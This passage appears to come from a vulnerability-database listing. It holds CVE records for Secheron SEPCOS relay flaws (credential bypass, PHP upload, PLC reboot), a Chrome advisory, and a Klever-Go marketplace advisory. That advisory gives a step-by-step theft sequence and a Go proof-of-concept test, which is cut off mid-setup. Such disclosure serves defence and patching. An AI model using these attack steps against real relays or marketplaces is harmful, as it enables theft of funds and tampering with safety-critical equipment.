              "changes": [
                {
                  "at": "1.24.8",
                  "status": "unaffected"
                },
                {
                  "at": "1.25.3",
                  "status": "unaffected"
                }
              ],
              "lessThan": "1.23.21",
              "status": "affected",
              "version": "All versions",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Anthony Candarini of AECOM, Clark Bradley of Elliott Davis, Mike Curnow of AECOM, and Balakrishna Subramoney of SAM Analytic Solutions reported these vulnerabilities to CISA."
        }
      ],
      "datePublic": "2022-06-23T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Client-side JavaScript controls may be bypassed to change user credentials and permissions without authentication, including a \u201croot\u201d user level meant only for the vendor. Web server root level access allows for changing of safety critical parameters."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841  IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-24T15:00:31.000Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Secheron recommends updating its software to the latest version:\n\nSEPCOS Single Package firmware (1.23.xx feature level): Update to 1.23.22 or higher version\nSEPCOS Single Package firmware (1.24.xx feature level): Update to 1.24.8 or higher version\nSEPCOS Single Package firmware (1.25.xx feature level): Update to 1.25.3 or higher version"
        }
      ],
      "source": {
        "advisory": "ICSA-22-174-03",
        "discovery": "EXTERNAL"
      },
      "title": "Secheron SEPCOS Control and Protection Relay",
      "workarounds": [
        {
          "lang": "en",
          "value": "Additional workarounds are suggested to help reduce the risk:\n\nConfigure the network such that PLC communications are strictly limited to only the devices required to perform its functions.\nLimit remote access and close Ports 80 and 443 at the switch level.\nOnly use approved devices to connect to the PLCs. Do not connect personal peripherals (USB sticks, hotspots) to approved devices.\nCheck device logs during periodic maintenance for unauthorized changes or access."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "DATE_PUBLIC": "2022-06-23T17:01:00.000Z",
          "ID": "CVE-2022-2105",
          "STATE": "PUBLIC",
          "TITLE": "Secheron SEPCOS Control and Protection Relay"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SEPCOS Control and Protection Relay firmware package",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.23.21"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.24.8"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.25.3"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Secheron"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Anthony Candarini of AECOM, Clark Bradley of Elliott Davis, Mike Curnow of AECOM, and Balakrishna Subramoney of SAM Analytic Solutions reported these vulnerabilities to CISA."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Client-side JavaScript controls may be bypassed to change user credentials and permissions without authentication, including a \u201croot\u201d user level meant only for the vendor. Web server root level access allows for changing of safety critical parameters."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-841  IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03",
              "refsource": "MISC",
              "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Secheron recommends updating its software to the latest version:\n\nSEPCOS Single Package firmware (1.23.xx feature level): Update to 1.23.22 or higher version\nSEPCOS Single Package firmware (1.24.xx feature level): Update to 1.24.8 or higher version\nSEPCOS Single Package firmware (1.25.xx feature level): Update to 1.25.3 or higher version"
          }
        ],
        "source": {
          "advisory": "ICSA-22-174-03",
          "discovery": "EXTERNAL"
        },
        "work_around": [
          {
            "lang": "en",
            "value": "Additional workarounds are suggested to help reduce the risk:\n\nConfigure the network such that PLC communications are strictly limited to only the devices required to perform its functions.\nLimit remote access and close Ports 80 and 443 at the switch level.\nOnly use approved devices to connect to the PLCs. Do not connect personal peripherals (USB sticks, hotspots) to approved devices.\nCheck device logs during periodic maintenance for unauthorized changes or access."
          }
        ]
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2022-2105",
    "datePublished": "2022-06-24T15:00:31.926Z",
    "dateReserved": "2022-06-16T00:00:00.000Z",
    "dateUpdated": "2025-04-16T16:16:16.151Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2102 (GCVE-0-2022-2102)

Vulnerability from cvelistv5 – Published: 2022-06-24 15:00 – Updated: 2025-04-16 16:16
VLAI
Title
Secheron SEPCOS Control and Protection Relay
Summary
Controls limiting uploads to certain file extensions may be bypassed. This could allow an attacker to intercept the initial file upload page response and modify the associated code. This modified code can be forwarded and used by a script loaded later in the sequence, allowing for arbitrary file upload into a location where PHP scripts may be executed.
SSVC
Exploitation: none Automatable: yes Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2025-04-16 15:55 UTC
CWE
  • CWE-841 - IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW
References
Impacted products
Vendor Product Version
Secheron SEPCOS Control and Protection Relay firmware package Affected: All versions , < 1.23.21 (custom)
Create a notification for this product.
Date Public
2022-06-23 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:24:44.203Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-2102",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-16T15:55:13.164067Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-16T16:16:00.619Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SEPCOS Control and Protection Relay firmware package",
          "vendor": "Secheron",
          "versions": [
            {
              "changes": [
                {
                  "at": "1.24.8",
                  "status": "unaffected"
                },
                {
                  "at": "1.25.3",
                  "status": "unaffected"
                }
              ],
              "lessThan": "1.23.21",
              "status": "affected",
              "version": "All versions",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Anthony Candarini of AECOM, Clark Bradley of Elliott Davis, Mike Curnow of AECOM, and Balakrishna Subramoney of SAM Analytic Solutions reported these vulnerabilities to CISA."
        }
      ],
      "datePublic": "2022-06-23T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Controls limiting uploads to certain file extensions may be bypassed. This could allow an attacker to intercept the initial file upload page response and modify the associated code. This modified code can be forwarded and used by a script loaded later in the sequence, allowing for arbitrary file upload into a location where PHP scripts may be executed."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841  IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-24T15:00:33.000Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Secheron recommends updating its software to the latest version:\n\nSEPCOS Single Package firmware (1.23.xx feature level): Update to 1.23.22 or higher version\nSEPCOS Single Package firmware (1.24.xx feature level): Update to 1.24.8 or higher version\nSEPCOS Single Package firmware (1.25.xx feature level): Update to 1.25.3 or higher version"
        }
      ],
      "source": {
        "advisory": "ICSA-22-174-03",
        "discovery": "EXTERNAL"
      },
      "title": "Secheron SEPCOS Control and Protection Relay",
      "workarounds": [
        {
          "lang": "en",
          "value": "Additional workarounds are suggested to help reduce the risk:\n\nConfigure the network such that PLC communications are strictly limited to only the devices required to perform its functions.\nLimit remote access and close Ports 80 and 443 at the switch level.\nOnly use approved devices to connect to the PLCs. Do not connect personal peripherals (USB sticks, hotspots) to approved devices.\nCheck device logs during periodic maintenance for unauthorized changes or access."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "DATE_PUBLIC": "2022-06-23T17:01:00.000Z",
          "ID": "CVE-2022-2102",
          "STATE": "PUBLIC",
          "TITLE": "Secheron SEPCOS Control and Protection Relay"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SEPCOS Control and Protection Relay firmware package",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.23.21"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.24.8"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.25.3"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Secheron"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Anthony Candarini of AECOM, Clark Bradley of Elliott Davis, Mike Curnow of AECOM, and Balakrishna Subramoney of SAM Analytic Solutions reported these vulnerabilities to CISA."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Controls limiting uploads to certain file extensions may be bypassed. This could allow an attacker to intercept the initial file upload page response and modify the associated code. This modified code can be forwarded and used by a script loaded later in the sequence, allowing for arbitrary file upload into a location where PHP scripts may be executed."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-841  IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03",
              "refsource": "MISC",
              "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Secheron recommends updating its software to the latest version:\n\nSEPCOS Single Package firmware (1.23.xx feature level): Update to 1.23.22 or higher version\nSEPCOS Single Package firmware (1.24.xx feature level): Update to 1.24.8 or higher version\nSEPCOS Single Package firmware (1.25.xx feature level): Update to 1.25.3 or higher version"
          }
        ],
        "source": {
          "advisory": "ICSA-22-174-03",
          "discovery": "EXTERNAL"
        },
        "work_around": [
          {
            "lang": "en",
            "value": "Additional workarounds are suggested to help reduce the risk:\n\nConfigure the network such that PLC communications are strictly limited to only the devices required to perform its functions.\nLimit remote access and close Ports 80 and 443 at the switch level.\nOnly use approved devices to connect to the PLCs. Do not connect personal peripherals (USB sticks, hotspots) to approved devices.\nCheck device logs during periodic maintenance for unauthorized changes or access."
          }
        ]
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2022-2102",
    "datePublished": "2022-06-24T15:00:33.724Z",
    "dateReserved": "2022-06-16T00:00:00.000Z",
    "dateUpdated": "2025-04-16T16:16:00.619Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-1667 (GCVE-0-2022-1667)

Vulnerability from cvelistv5 – Published: 2022-06-24 15:00 – Updated: 2025-04-16 16:16
VLAI
Title
Secheron SEPCOS Control and Protection Relay
Summary
Client-side JavaScript controls may be bypassed by directly running a JS function to reboot the PLC (e.g., from the browser console) or by loading the corresponding, browser accessible PHP script
SSVC
Exploitation: none Automatable: yes Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2025-04-16 15:55 UTC
CWE
  • CWE-841 - IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW
References
Impacted products
Vendor Product Version
Secheron SEPCOS Control and Protection Relay firmware package Affected: All versions , < 1.23.21 (custom)
Create a notification for this product.
Date Public
2022-06-23 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:10:03.859Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-1667",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-16T15:55:24.323966Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-16T16:16:23.607Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SEPCOS Control and Protection Relay firmware package",
          "vendor": "Secheron",
          "versions": [
            {
              "changes": [
                {
                  "at": "1.24.8",
                  "status": "unaffected"
                },
                {
                  "at": "1.25.3",
                  "status": "unaffected"
                }
              ],
              "lessThan": "1.23.21",
              "status": "affected",
              "version": "All versions",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Anthony Candarini of AECOM, Clark Bradley of Elliott Davis, Mike Curnow of AECOM, and Balakrishna Subramoney of SAM Analytic Solutions reported these vulnerabilities to CISA."
        }
      ],
      "datePublic": "2022-06-23T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Client-side JavaScript controls may be bypassed by directly running a JS function to reboot the PLC (e.g., from the browser console) or by loading the corresponding, browser accessible PHP script"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841  IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-24T15:00:30.000Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Secheron recommends updating its software to the latest version:\n\nSEPCOS Single Package firmware (1.23.xx feature level): Update to 1.23.22 or higher version\nSEPCOS Single Package firmware (1.24.xx feature level): Update to 1.24.8 or higher version\nSEPCOS Single Package firmware (1.25.xx feature level): Update to 1.25.3 or higher version"
        }
      ],
      "source": {
        "advisory": "ICSA-22-174-03",
        "discovery": "EXTERNAL"
      },
      "title": "Secheron SEPCOS Control and Protection Relay",
      "workarounds": [
        {
          "lang": "en",
          "value": "Additional workarounds are suggested to help reduce the risk:\n\nConfigure the network such that PLC communications are strictly limited to only the devices required to perform its functions.\nLimit remote access and close Ports 80 and 443 at the switch level.\nOnly use approved devices to connect to the PLCs. Do not connect personal peripherals (USB sticks, hotspots) to approved devices.\nCheck device logs during periodic maintenance for unauthorized changes or access."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "DATE_PUBLIC": "2022-06-23T17:01:00.000Z",
          "ID": "CVE-2022-1667",
          "STATE": "PUBLIC",
          "TITLE": "Secheron SEPCOS Control and Protection Relay"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "SEPCOS Control and Protection Relay firmware package",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.23.21"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.24.8"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "All versions",
                            "version_value": "1.25.3"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Secheron"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Anthony Candarini of AECOM, Clark Bradley of Elliott Davis, Mike Curnow of AECOM, and Balakrishna Subramoney of SAM Analytic Solutions reported these vulnerabilities to CISA."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Client-side JavaScript controls may be bypassed by directly running a JS function to reboot the PLC (e.g., from the browser console) or by loading the corresponding, browser accessible PHP script"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-841  IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03",
              "refsource": "MISC",
              "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Secheron recommends updating its software to the latest version:\n\nSEPCOS Single Package firmware (1.23.xx feature level): Update to 1.23.22 or higher version\nSEPCOS Single Package firmware (1.24.xx feature level): Update to 1.24.8 or higher version\nSEPCOS Single Package firmware (1.25.xx feature level): Update to 1.25.3 or higher version"
          }
        ],
        "source": {
          "advisory": "ICSA-22-174-03",
          "discovery": "EXTERNAL"
        },
        "work_around": [
          {
            "lang": "en",
            "value": "Additional workarounds are suggested to help reduce the risk:\n\nConfigure the network such that PLC communications are strictly limited to only the devices required to perform its functions.\nLimit remote access and close Ports 80 and 443 at the switch level.\nOnly use approved devices to connect to the PLCs. Do not connect personal peripherals (USB sticks, hotspots) to approved devices.\nCheck device logs during periodic maintenance for unauthorized changes or access."
          }
        ]
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2022-1667",
    "datePublished": "2022-06-24T15:00:30.365Z",
    "dateReserved": "2022-05-10T00:00:00.000Z",
    "dateUpdated": "2025-04-16T16:16:23.607Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-255W-J3FM-6R98

Vulnerability from github – Published: 2026-09-29 18:32 – Updated: 2026-10-02 15:31
VLAI
Details

Inappropriate implementation in PlatformIntegration in Google Chrome on on Windows prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-95385"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-841"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-09-29T18:17:32Z",
    "severity": "MODERATE"
  },
  "details": "Inappropriate implementation in PlatformIntegration in Google Chrome on on Windows prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Low)",
  "id": "GHSA-255w-j3fm-6r98",
  "modified": "2026-10-02T15:31:13Z",
  "published": "2026-09-29T18:32:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-95385"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2026/09/stable-channel-update-for-desktop_0856730748.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/517192965"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-26R5-4MM2-PX5C

Vulnerability from github – Published: 2026-09-23 21:24 – Updated: 2026-09-23 21:24
VLAI
Summary
Klever-Go: Zombie-order theft: `Buy` missing `IsClaimed` guard in native marketplace
Details

Location: core/kapp/market/market.go — Buy() (approx. L281–436)\ Severity: High

The native marketplace enforces an IsClaimed guard in Claim (market.go:752), CancelOrder (market.go:1125), and orderEscrowAmount (market.go:251), but not in Buy.

Marketplace escrow is virtual: the market KApp account never custodies currency. A bid burns funds from the bidder (bidderAcc.SubFromBalance, ~L378), and refunds/payouts mint to the recipient (AddToBalance, e.g. the prior-bidder refund at ~L349). Soundness depends on each order's CurrentBid being paid out exactly once.

A seller can settle a resting-bid auction early via the seller-accept branch of Claim (~L776) → executeBuyMarket (~L656). That path sets IsClaimed=true, delivers the NFT, pays the seller, and re-saves the order (SetMarketOrder, ~L726) — but, unlike every other settle path, it does not reset EndTime (contrast immediate-buy Buy ~L416 and CancelOrder ~L1206), and no code path deletes the order. The result is a "zombie" order: already settled, yet still loadable with EndTime in the future and a stale CurrentBidder.

Because Buy has no IsClaimed guard, a new bidder can still Buy on that settled order (the bid guard at ~L317 only forces the new amount Y > CurrentBid X). The new bidder is debited Y; the prior bidder is refunded X (funded by the new bidder, not minted); the new bidder becomes CurrentBidder on an IsClaimed order and can then neither Claim (reverts on IsClaimed) nor CancelOrder (reverts on IsClaimed). Their funds are lost permanently.

Attack sequence (permissionless , anyone can create a sell order): 1. Attacker (seller S) creates a resting-bid auction (Price=0, ReservePrice>0) for an NFT and self-bids X as bidder A (Sybil). 2. S accepts A's bid early via Claim → NFT goes to A (= attacker, keeps it), S (= attacker) collects the owner payout, order marked IsClaimed=true but left "live". 3. Victim B bids Y > X on the still-live-looking auction via Buy. Buy refunds prior bidder A the amount X (AddToBalance, L349) and burns Y from B (SubFromBalance, L378). 4. B is now CurrentBidder on a claimed order and can neither Claim nor CancelOrder — both revert on IsClaimed. B's Y is unrecoverable; X of it was siphoned to A; Y−X is destroyed.

POC

package market

import (
    "testing"

    "github.com/klever-io/klever-go/common/mock"
    "github.com/klever-io/klever-go/core/kapp"
    "github.com/klever-io/klever-go/core/process/kda/kdautils"
    "github.com/klever-io/klever-go/data/block"
    "github.com/klever-io/klever-go/data/state"
    "github.com/klever-io/klever-go/data/transaction"
    "github.com/klever-io/klever-go/kapps"
    "github.com/klever-io/klever-go/kvm/mock/stub"
    "github.com/stretchr/testify/require"
)

// TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy proves the fund-loss / theft
// vulnerability caused by `Buy` lacking the `IsClaimed` guard that `Claim`
// (market.go L752) and `CancelOrder` (market.go L1125) both enforce.
//
// Attack (attacker A == seller S, victim B):
//  1. S lists an NFT as an Auction with Price=0, ReservePrice=R (bids REST).
//  2. A places a resting bid X >= R via Buy (records CurrentBid/CurrentBidder,
//     no settlement because Price==0).
//  3. S accepts the resting bid early via Claim's seller-accept branch (L776),
//     which routes to executeBuyMarket: IsClaimed=true, NFT delivered to A,
//     proceeds paid to S(=A). This settle path is the ONLY one that does NOT
//     reset EndTime and does NOT delete the order -> the order becomes a live
//     "zombie" (IsClaimed=true, EndTime in the future, still loadable).
//  4. Victim B calls Buy on the zombie order with Y > X. Buy has no IsClaimed
//     guard, so it SUCCEEDS: B is debited Y, prior bidder A is "refunded" X
//     (funded by B), and B becomes CurrentBidder on an already-claimed order.
//  5. B can NEITHER Claim (reverts on IsClaimed) NOR CancelOrder (reverts on
//     IsClaimed). B's Y is unrecoverable; X of it is siphoned to A.
//
// HARM proven: B ends down Y with no NFT and no recovery path; A ends up X.
func TestPoC_ZombieOrder_MissingIsClaimedGuardInBuy(t *testing.T) {
    const (
        blockTime   = int64(1000)
        endTime     = int64(1_001_000) // future relative to blockTime
        reserve     = int64(1_000_000) // R
        bidX        = int64(1_000_000) // A's resting bid (== reserve, >= reserve required)
        bidY        = int64(2_000_000) // B's bid on the zombie order (must be > X)
        fundAttacker = int64(10_000_000)
        fundVictim   = int64(10_000_000)
    )

    klv := kdautils.KLVIdentifier
    collectionID := []byte("ZOMBIE-COLL")
    assetID := []byte("1")
    marketplaceID := []byte("mp-zombie")
    orderID := []byte("order-zombie")

    attacker := defaultAddr  // A == S (seller and first bidder)
    victim := defaultOther   // B

    marketKApp, accCacher, forkController := createTestMarketKApp(t)
    // Post-fork behaviour (guards on royalty overflow enabled); does not touch
    // the missing-IsClaimed-guard path being tested.
    forkController.FixMarketBuyOverflowValue = true

    // --- Fund the two user accounts (Buy debits real balances) ---
    attackerAcc, err := accCacher.LoadUser(attacker)
    require.NoError(t, err)
    require.NoError(t, attackerAcc.AddToBalance(fundAttacker, klv, false))
    require.NoError(t, accCacher.UpdateUser(attackerAcc))

    victimAcc, err := accCacher.LoadUser(victim)
    require.NoError(t, err)
    require.NoError(t, victimAcc.AddToBalance(fundVictim, klv, false))
    require.NoError(t, accCacher.UpdateUser(victimAcc))

    // --- Set up the market KApp: marketplace + escrowed NFT + resting auction order ---
